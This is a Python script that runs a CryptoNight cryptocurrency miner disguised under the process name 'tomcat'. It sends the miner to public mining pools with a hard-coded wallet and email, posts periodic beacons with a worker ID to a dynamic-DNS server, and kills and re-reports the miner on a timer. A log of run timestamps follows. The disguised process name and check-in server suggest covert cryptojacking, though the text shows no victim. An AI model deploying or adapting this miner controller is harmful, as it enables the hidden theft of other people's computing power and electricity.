import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:06.579798
#2018-02-17 16:34:07.740130
#2018-02-17 18:23:03.442849
#2018-02-17 20:11:01.275732
#2018-02-17 21:58:04.997065
#2018-02-17 23:43:04.887798
#2018-02-18 01:33:06.104151
#2018-02-18 03:18:07.029875
#2018-02-18 05:07:03.922862
#2018-02-18 07:00:09.042940
#2018-02-18 08:49:05.613752
#2018-02-18 10:36:07.449615
#2018-02-18 12:21:05.438992
#2018-02-18 14:08:06.028867
#2018-02-18 15:58:04.090109
#2018-02-18 17:47:05.984926
#2018-02-18 19:33:06.514915
#2018-02-18 21:18:05.606641
#2018-02-18 23:06:06.583107
#2018-02-19 00:53:06.762711
#2018-02-19 02:40:07.408289
#2018-02-19 04:27:01.999557
#2018-02-19 06:12:05.732805
#2018-02-19 08:01:07.726206
#2018-02-19 09:51:06.000703
#2018-02-19 11:40:04.771350
#2018-02-19 13:28:04.262309
#2018-02-19 15:18:07.563300
#2018-02-19 17:08:06.210886
#2018-02-19 18:53:05.535328
#2018-02-19 20:31:06.907364
#2018-02-19 22:18:03.824105
#2018-02-20 00:03:07.401664
#2018-02-20 01:50:08.914911
#2018-02-20 03:39:01.785202
#2018-02-20 05:25:01.387951
#2018-02-20 07:09:05.874107
#2018-02-20 08:55:08.065136
#2018-02-20 10:39:04.383326
#2018-02-20 12:25:10.993850
#2018-02-20 14:13:07.643838
#2018-02-20 15:57:11.623507
#2018-02-20 17:43:06.975612
#2018-02-20 19:33:08.932145
#2018-02-20 21:21:06.514135
#2018-02-20 23:05:06.167840
#2018-02-21 00:49:01.866860
#2018-02-21 02:34:03.950347
#2018-02-21 04:22:05.271003
#2018-02-21 06:08:06.132495
#2018-02-21 07:55:09.347292
#2018-02-21 09:40:09.246433
#2018-02-21 11:31:01.544435
#2018-02-21 13:19:07.394042
#2018-02-21 15:05:06.926338
#2018-02-21 16:56:05.789173
#2018-02-21 18:44:06.733464
#2018-02-21 20:36:08.627362
#2018-02-21 22:22:07.056373
#2018-02-22 00:11:07.796250
#2018-02-22 01:59:06.042299
#2018-02-22 03:46:07.559326
#2018-02-22 05:33:01.593766
#2018-02-22 07:18:03.772083
#2018-02-22 09:07:01.976467
#2018-02-22 10:55:04.950507
#2018-02-22 12:41:09.280575
#2018-02-22 14:44:11.049183
#2018-02-22 16:31:05.672178
#2018-02-22 18:17:07.322163
#2018-02-22 20:07:06.111579
#2018-02-22 21:56:01.917182
#2018-02-22 23:43:01.952631
#2018-02-23 01:31:08.591821
#2018-02-23 03:17:07.222582
#2018-02-23 05:03:05.607930
#2018-02-23 06:49:03.553219
#2018-02-23 08:41:05.974094
#2018-02-23 10:57:02.078714
#2018-02-23 12:54:08.692898
#2018-02-23 14:38:06.632143
#2018-02-23 16:28:06.062187
#2018-02-23 18:16:09.104389
#2018-02-23 20:00:02.496286
#2018-02-23 21:43:05.877158
#2018-02-23 23:36:07.648568
#2018-02-24 01:25:06.806517
#2018-02-24 03:17:03.582980
#2018-02-24 05:02:07.089745
#2018-02-24 06:52:01.510290
#2018-02-24 08:42:05.347031
#2018-02-24 10:26:05.403969
#2018-02-24 12:21:06.393237
#2018-02-24 14:12:05.222302
#2018-02-24 15:58:06.746217
#2018-02-24 17:49:05.388725
#2018-02-24 19:37:01.296147
#2018-02-24 21:24:04.088225
#2018-02-25 00:05:05.432362
#2018-02-25 03:19:02.014978
#2018-02-25 06:50:03.977964